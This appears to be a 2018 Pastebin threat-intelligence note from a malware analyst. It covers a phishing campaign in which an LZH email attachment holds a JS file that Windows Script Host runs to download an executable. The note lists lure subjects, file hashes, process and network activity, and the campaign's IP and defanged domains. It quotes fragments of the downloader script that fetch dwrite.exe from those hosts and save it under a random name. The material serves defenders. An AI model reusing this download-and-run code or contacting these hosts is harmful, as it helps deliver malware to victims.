SHARE
TWEET

#js_111018

VRad Oct 11th, 2018 (edited) 311 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #? #lzh #js #WSH
  2.  
  3. https://pastebin.com/MP3kCSSh
  4. https://radetskiy.wordpress.com/?s=WSH
  5.  
  6. shema
  7. --------------
  8. email attach(lzh) > js > wsh > get 2URL > %templates%\random.exe
  9.  
  10. email_headers
  11. --------------
  12. n/a
  13.  
  14. email_subjects
  15. --------------
  16. "рахунки ТОВ Заря. оплатить до конца недели"
  17. "Рахунки Богданова за 10е"
  18.  
  19. files
  20. --------------
  21. SHA-256 a146baacebf4889c153bb28e37b013d09730265e3fa70f5542d9a878cf103ac2
  22. File name   Рахунки до оплати ТОВ СМБ.lzh  LHarc 1.x/ARX archive data [lh0]
  23. File size   86.76 KB
  24.  
  25. SHA-256 241851549298ad7fe353c62a6f8e9fa2fdf50a1fb2160bc72588904fe49522c3
  26. File name   QoC5kb2N4?= [CLEAN]
  27. File size   5.73 KB
  28.  
  29. SHA-256 d6995bdfa7e95b5bb1d64931cbeedfb48a5c9b3d76494a1b2d4121fa7a6e25d0
  30. File name   Pax. 00295 10.10.2018p.xls.js
  31. File size   80.94 KB
  32.  
  33. SHA-256 d3a9a5b6f02b8df627d0e792fdd15761a9cefd12f5464466eca30ac90b7b911e
  34. File name   82371Equipmentthe > [dwrite.exe]    !This program cannot be run in DOS mode
  35. File size   428 KB
  36.  
  37. script
  38. --------------
  39. var wsh = new ActiveXObject("wscript.shell");
  40. var path = wsh.SpecialFolders("templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
  41. HTTP.Open("GET", "http://sfbotvinnik{.} icu/folua/dwrite.exe", false); HTTP.Send();
  42. else
  43. { HTTP.Open("GET", "http://centurionsix{.} website/folua/dwrite.exe", false);
  44.  
  45. activity
  46. **************
  47.  
  48. proc
  49. --------------
  50. "C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax. 00295 10.10.2018p.xls.js"
  51. "C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\658656.exe"
  52.  
  53. netwrk
  54. --------------
  55. 93.179.68.94    sfbotvinnik{.} icu  GET /folua/dwrite.exe HTTP/1.1  Mozilla/4.0
  56.  
  57. comp
  58. --------------
  59. wscript.exe 2204    93.179.68.94    80  ESTABLISHED
  60.  
  61. persist
  62. --------------
  63. n/a
  64.  
  65. # # #
  66. https://www.virustotal.com/#/file/a146baacebf4889c153bb28e37b013d09730265e3fa70f5542d9a878cf103ac2/details
  67. https://www.virustotal.com/#/file/241851549298ad7fe353c62a6f8e9fa2fdf50a1fb2160bc72588904fe49522c3/details
  68. https://www.virustotal.com/#/file/d6995bdfa7e95b5bb1d64931cbeedfb48a5c9b3d76494a1b2d4121fa7a6e25d0/community
  69. https://www.virustotal.com/#/file/d3a9a5b6f02b8df627d0e792fdd15761a9cefd12f5464466eca30ac90b7b911e/detection
  70. https://analyze.intezer.com/#/analyses/a8fa2a81-4187-4b98-bfc9-4b322edf31bc
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top